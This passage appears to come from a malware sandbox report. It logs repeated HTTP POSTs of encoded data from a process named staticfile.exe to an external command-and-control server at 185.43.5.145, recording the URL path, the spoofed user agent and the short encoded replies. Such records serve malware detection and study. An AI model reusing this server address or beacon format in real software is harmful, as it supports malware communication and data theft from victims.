                  Data Raw: 02 1a 27 11 37 26 3c 50 28 2c 24 19 24 16 0c 54 28 31 2a 18 2c 3e 2e 00 29 00 25 5e 2e 11 27 5a 22 02 2d 5c 2a 07 37 1e 24 18 30 01 21 0b 2d 5d 02 1a 23 02 35 32 03 1c 27 33 34 05 2d 23 00 41 29 0a 22 13 27 15 21 0a 31 16 28 0f 34 0a 35 57 31 1c 04 0a 2d 27 3b 59 2c 0e 3f 0f 27 00 23 5f 03 14 3a 0a 21 2e 38 13 31 08 2e 5a 20 01 29 1f 21 34 3d 57 3e 06 34 05 2b 5d 3d 03 27 08 37 02 27 04 22 11 3e 2a 31 0c 22 2c 34 10 29 33 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: '7&<P(,$$T(1*,>.)%^.'Z"-\*7$0!-]#52'34-#A)"'!1(45W1-';Y,?'#_:!.81.Z )!4=W>4+]='7'">*1",4)3 P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.549810185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:00.126884937 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:00.474874973 CET1048OUTData Raw: 54 54 5d 53 5d 45 5a 5d 54 58 56 53 59 5d 58 5c 55 57 5c 5d 51 5e 53 59 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TT]S]EZ]TXVSY]X\UW\]Q^SYT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$<,.?=+!2#'<*5(T=;"X1;7V"-[",0(9[".Z/"
                  Dec 27, 2024 04:03:01.500868082 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:01.781069994 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:01 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.549816185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:02.035291910 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:02.381148100 CET1048OUTData Raw: 51 52 5d 5e 5d 49 5f 56 54 58 56 53 59 5d 58 53 55 51 5c 5a 51 5e 53 58 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QR]^]I_VTXVSY]XSUQ\ZQ^SXT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+2[+.8!?&_6 *]&[1##31W-($\5?<9[".Z/"
                  Dec 27, 2024 04:03:03.365736008 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:03.600866079 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:03 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.549821185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:03.851660013 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:04.209291935 CET1048OUTData Raw: 51 55 58 5a 5d 47 5a 51 54 58 56 53 59 5e 58 5d 55 55 5c 5b 51 50 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QUXZ]GZQTXVSY^X]UU\[QPSZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A??*^<>+"11?5:(>;=&+#Z43.9 [!,8):9[".Z/.
                  Dec 27, 2024 04:03:05.358464956 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:05.606223106 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:05 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.549827185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:05.846872091 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:06.193594933 CET1048OUTData Raw: 51 57 5d 5b 58 45 5a 55 54 58 56 53 59 54 58 52 55 52 5c 5f 51 50 53 52 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QW][XEZUTXVSYTXRUR\_QPSRT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'</&\<?#2'Y1<5[!'*]>Z%?[ 1S.#/;(9[".Z/


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.549828185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:06.563997030 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:06.912358999 CET1328OUTData Raw: 54 50 5d 5e 5d 47 5a 56 54 58 56 53 59 55 58 5c 55 57 5c 58 51 5c 53 59 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TP]^]GZVTXVSYUX\UW\XQ\SYT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'@?Y1?=+#1#1=^#94U)]%%?4 .-^!<+*9[".Z/
                  Dec 27, 2024 04:03:08.018030882 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:08.271533966 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:07 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 27 13 23 26 2f 09 3d 05 23 0a 25 38 25 0f 28 57 39 05 38 03 35 59 2a 2e 29 5d 2d 2c 3f 5c 22 3f 32 05 2a 10 0e 03 24 0f 33 1f 23 31 2d 5d 02 1a 20 10 22 31 29 50 30 30 2c 05 2c 33 2d 19 3e 30 36 13 27 15 3a 19 31 3b 23 55 23 30 39 51 25 1c 2d 50 2e 1a 02 06 2c 09 38 53 33 3a 23 5f 03 14 39 14 22 3e 0a 1e 31 0f 03 01 23 06 3a 0d 36 42 36 0f 28 2b 38 00 28 3b 3d 05 24 1f 3c 58 24 5b 32 54 3e 39 39 0a 21 12 0d 04 2b 23 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: '#&/=#%8%(W985Y*.)]-,?\"?2*$3#1-] "1)P00,,3->06':1;#U#09Q%-P.,8S3:#_9">1#:6B6(+8(;=$<X$[2T>99!+# P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.549829185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:06.715203047 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:07.068591118 CET1048OUTData Raw: 54 55 58 5d 5d 45 5a 51 54 58 56 53 59 5a 58 53 55 56 5c 5a 51 5c 53 5f 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TUX]]EZQTXVSYZXSUV\ZQ\S_T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C)?+=;5<1*! *;%]7Y 19,5+*9[".Z/>
                  Dec 27, 2024 04:03:08.054358006 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:08.293216944 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:07 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.549835185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:08.530148029 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:08.881104946 CET1048OUTData Raw: 51 55 58 59 5d 45 5a 54 54 58 56 53 59 59 58 52 55 50 5c 5c 51 59 53 5c 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QUXY]EZTTXVSYYXRUP\\QYS\T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'),"(X+5W?Z&?69#>:28'Z40S:",#+:9[".Z/2
                  Dec 27, 2024 04:03:09.958786964 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:10.166145086 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:09 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.549841185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:10.405571938 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:10.756063938 CET1048OUTData Raw: 54 55 58 5a 58 40 5a 56 54 58 56 53 59 5e 58 52 55 51 5c 5c 51 5a 53 5f 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TUXZX@ZVTXVSY^XRUQ\\QZS_T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C(??>5/2?-]#9)"&,# -S9;$Z!< U?9[".Z/.
                  Dec 27, 2024 04:03:11.769332886 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:12.014177084 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:11 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.549842185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:12.245264053 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:12.599802017 CET1048OUTData Raw: 54 54 5d 58 5d 42 5f 56 54 58 56 53 59 5d 58 50 55 5c 5c 59 51 51 53 5b 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TT]X]B_VTXVSY]XPU\\YQQS[T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'B</1<>?!";2?!P==&('##":8(\"#+*9[".Z/"


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.549848185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:13.407828093 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:13.796386957 CET1328OUTData Raw: 54 55 5d 5f 58 45 5f 57 54 58 56 53 59 5b 58 5d 55 5c 5c 5b 51 5b 53 53 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TU]_XE_WTXVSY[X]U\\[Q[SST_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'@</(>^"1;Z2?^58V+;%&8#Y7V:.5<,U+*9[".Z/
                  Dec 27, 2024 04:03:14.785063982 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:15.026290894 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:14 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 24 01 23 1c 27 0e 2a 02 3f 08 30 38 00 56 28 0f 22 5f 2f 04 2d 58 3e 3d 3e 00 39 06 23 10 20 3c 03 5b 2a 2d 23 10 24 08 27 5b 21 0b 2d 5d 02 1a 20 5a 21 0c 29 57 24 30 30 03 2e 23 2d 1d 3d 33 26 10 24 15 3a 19 25 06 38 0f 20 23 3a 08 26 32 39 51 2d 1d 37 13 2c 27 2f 0d 27 10 23 5f 03 14 39 1b 23 2e 0e 5b 31 32 26 11 20 28 3d 1f 20 27 21 1d 29 38 09 1f 2b 2b 3d 05 27 21 33 03 24 3d 2e 55 29 17 2a 54 23 3c 24 59 2b 23 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: $#'*?08V("_/-X>=>9# <[*-#$'[!-] Z!)W$00.#-=3&$:%8 #:&29Q-7,'/'#_9#.[12& (= '!)8++='!3$=.U)*T#<$Y+# P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.549849185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:13.529102087 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:13.882277012 CET1048OUTData Raw: 54 50 5d 53 58 44 5a 5d 54 58 56 53 59 5a 58 50 55 53 5c 5d 51 5f 53 52 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TP]SXDZ]TXVSYZXPUS\]Q_SRT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'<,"]?X+"W#\15:8)+^27[#V%-](]5Z$<*9[".Z/>
                  Dec 27, 2024 04:03:14.908696890 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:15.150134087 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:14 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.549853185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:15.387526989 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:15.740477085 CET1048OUTData Raw: 51 55 5d 5d 5d 47 5f 57 54 58 56 53 59 5f 58 57 55 57 5c 56 51 58 53 5c 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QU]]]G_WTXVSY_XWUW\VQXS\T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'F+<-?>6<%/5\")+&^2'Z40-T- ^!,$+:9[".Z/*
                  Dec 27, 2024 04:03:16.751667976 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:16.998159885 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:16 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.549859185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:17.282381058 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:17.631026030 CET1048OUTData Raw: 54 5b 5d 5d 5d 49 5a 51 54 58 56 53 59 55 58 53 55 56 5c 5e 51 50 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: T[]]]IZQTXVSYUXSUV\^QPS]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$(/%<(^#!\%5597*(6Z17329+("W)*9[".Z/
                  Dec 27, 2024 04:03:18.660571098 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:18.902270079 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:18 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.549862185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:19.137500048 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
